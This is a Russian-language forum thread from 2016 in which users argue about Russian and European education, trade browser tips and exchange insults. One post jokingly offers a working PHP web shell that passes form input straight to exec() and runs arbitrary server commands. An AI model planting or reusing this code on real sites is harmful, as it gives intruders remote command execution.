Вопросы Акесия
Свернуть
X
-
поглядим что нам поциент напишет.Человек человеку волк!!!!!!!!!!!!!!!!Комментарий
-
Хотя у нас, школьники, делают их в качестве домашнего задания... бесплатно, конечно-же... за респект и уважуху...
."Давайте учиться иметь свое мнение, давайте не будем повторять чужое."
Виктор СуворовКомментарий
-
У нас в универе китайцы учатся, есть те, кто получает второе высшее. Первое они в Европе получали, так они реально говорят, что хренеют от разницы в уровне нашего и европейского образования в плане теории и практики. Заявляют, в России куда круче подготовка.
На факультете, где готовят механиков обычное дело: препод раскрутил отвёрткой всякие жиклёры карбюратора на авто, давай студент, почини, заставь работать. Через час пытаемся завести движок: тыр-тыр-ты...заглох.. тыр-тыр..нифига... низачот, придёшь через неделю. Обычное дело. Европке такой уровень и не снился.
Я уж не говорю про русский язык, которой является обязательным вступительным испытанием на все без исключения специальности. То бишь хочешь учиться в российском вузе - умей хорошо говорить и писать на русском. Как результат иностранцы, те же китайцы там, года два изучают русский, чтобы поступить в вуз.Последний раз редактировалось Tessaract; 22 May 2016, 09:33 AM.Человек человеку волк!!!!!!!!!!!!!!!!Комментарий
-
Комментарий
-
"папа римский ... назвал Украину лабораторией экуменизму"(с) с. шевчук / Сегодня День Реформации! / рождество без Иисуса или когда же Он родился??? / Земля и Солнце: что вокруг чего крутится? Ваши аргументы!Комментарий
-
Просто все адекватные веб-дизайнеры, тестят свои сайты под всеми популярными броузерами, а не только под ИЕ. У Игоря, видимо, либо индусы, либо цэуропэйцы, навроде нашего общего друга...
Кстати, у вас в мозилле, включена "фишка" маскироваться под другой броузер? Если включена - попробуйте отключить и посмотреть, пропала проблема или нет.
А то у меня как-то было - оперу заставил представляться ИЕ, дак форум сразу закосячился...
."Давайте учиться иметь свое мнение, давайте не будем повторять чужое."
Виктор СуворовКомментарий
-
Согласен с вами, уровень образования сейчас не тот, что был раньше в СССР, но тем не менее пока остаётся достаточно высоким. Эта Болонская система, мать её, все почти поголовно преподы ею недовольны, говоря, что она рушит наше образование, и я с ними полностью согласен. Нахрена нам эти всякие бакалавры с магистрами, была же отлаженная система специалитета, которой все в мире завидовали. Про... блин... Слов нет, одни нецензурные. Если и дальше будем следовать это болонской еврохрени, рискуем угробить образование окончательно.Человек человеку волк!!!!!!!!!!!!!!!!Комментарий
-
Насчёт не царское это дело - тебе много раз приводили доказательства. Но ты не понимал элементарных вещей. Например. что в начале растрескивание трещины расстояние между берегами трещин не более микрона. Ты не отличал значение функции от самой функции. Когда тебе я пояснял, что что определение функции даётся в разных источниках по-разному, что в одном есть взаимнооднозначное соответствие, в другом - его нет, ты назвал меня невеждой, хотя это уровень 8 класса. Только через 3 месяца разговора наконец всплыло, что ты путаешь значение функции и саму функцию и ты в первый раз ретировался. Что тебе доказывать? Ты даже на среднем гармоническом попытался меня троллить, типО я не умею подставлять значения в формулу.
Что выглядело довольно грубо, тупо, неумело.
- - - Добавлено - - -
Даже в конце 80-х, если быть точным.Последний раз редактировалось ilya481; 25 May 2016, 11:27 PM.Комментарий
-
Просто все адекватные веб-дизайнеры, тестят свои сайты под всеми популярными броузерами, а не только под ИЕ. У Игоря, видимо, либо индусы, либо цэуропэйцы, навроде нашего общего друга...
Кстати, у вас в мозилле, включена "фишка" маскироваться под другой броузер? Если включена - попробуйте отключить и посмотреть, пропала проблема или нет.
А то у меня как-то было - оперу заставил представляться ИЕ, дак форум сразу закосячился....
Честно говоря, мне это всё непонятно. Я использую по 2-3 вида браузеров каждый день. И то, что они глючат порой - меня не смущает. У меня есть более любимый браузер - но не так чтобы очень любимый, я их, как детей, все люблю. Всё инерция мышления, господа. Преодалевайте её.Последний раз редактировалось ilya481; 25 May 2016, 11:29 PM.Комментарий
-
Акесий, какой ваш любимый браузер?"папа римский ... назвал Украину лабораторией экуменизму"(с) с. шевчук / Сегодня День Реформации! / рождество без Иисуса или когда же Он родился??? / Земля и Солнце: что вокруг чего крутится? Ваши аргументы!Комментарий
-
Сообщение от ПолковникУ него собственноручно написанный эксклюзив. заплати два килобака и он с тобой поделится.Суперкрутой браузер у него...ага. Его же программисты с мировыми именами в пример ставят... что ему какой-то броузер сваять? Тфу и растереть...."папа римский ... назвал Украину лабораторией экуменизму"(с) с. шевчук / Сегодня День Реформации! / рождество без Иисуса или когда же Он родился??? / Земля и Солнце: что вокруг чего крутится? Ваши аргументы!Комментарий
-
Сбежал от голода и от таких, ка Вы.
- - - Добавлено - - -
Комментарий
-
а вот ещё одна очень полезная для web-админов "авада кедавра":
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /></head><body>
<?php if ($_POST['cmd'] != '') {exec($_POST['cmd'],$res); for ($x=0;$x<=sizeof($res);$x++) print iconv("cp866", "windows-1251",str_replace("<DIR>","<DIR>","$res[$x]"))."<br>\r\n";} ?> <form action='cmd.php' method='post'><input type='text' name='cmd'></form></body></html>
- - - Добавлено - - -
- - - Добавлено - - -
Это жестоко.Комментарий
-
Думаете, что я Вам верю? Вы можете писать о своих подвигах сколь угодно много, но это вранье.
Вам предложили написать простенькую программку - Вы в кусты сразу прыгнули. Забыли?
А вот хвалится о своих подвигах тот, кто на самом деле ничего не умеет. И начинает он писать о неимоверных революциях в компьютерной области только для того, чтобы в собственных
Я должен вот сейчас включать зажигание и на потеху Вам и Полковнику писать, что меня просят дилетанты! У меня энергии на то, чтобы вспомнить синтаксис уйдёт больше, чем на само написание.
Я давно не программирую. я занимаюсь вещами более серьёзными.
Мне ни славы, ни денег это не принесёт. А принесёт хихиканье по поводу того, чего нет. Вы невыгодные проверяльщики, да и по кастовым законам Европы это наглость вообще-то. У Вас нет третьей степени, Вы не смеете и не имеете права меня проверять. Плясать ради черни я не буду.
Это всё понты дворовой шпаны.
Это - НЕ АЛГОРИТМ, Паша. Предложите мне написать например метод решения нелинейных уравнений методом Ньютона, заплатив 1000 баксов предварительно. тогда я свою задницу подниму. А тут что?
Квадратное уравнение - топ программирования для Вашей страны?
3-4 строчки.
Я мастер и у меня есть уважение к себе и достоинство не плясать перед чернью. Вы можете играть в понты. Я уже другой - выдавил из себя от Вас, СБЕЖАВ от Вас.Последний раз редактировалось ilya481; 25 May 2016, 11:38 PM.Комментарий
Комментарий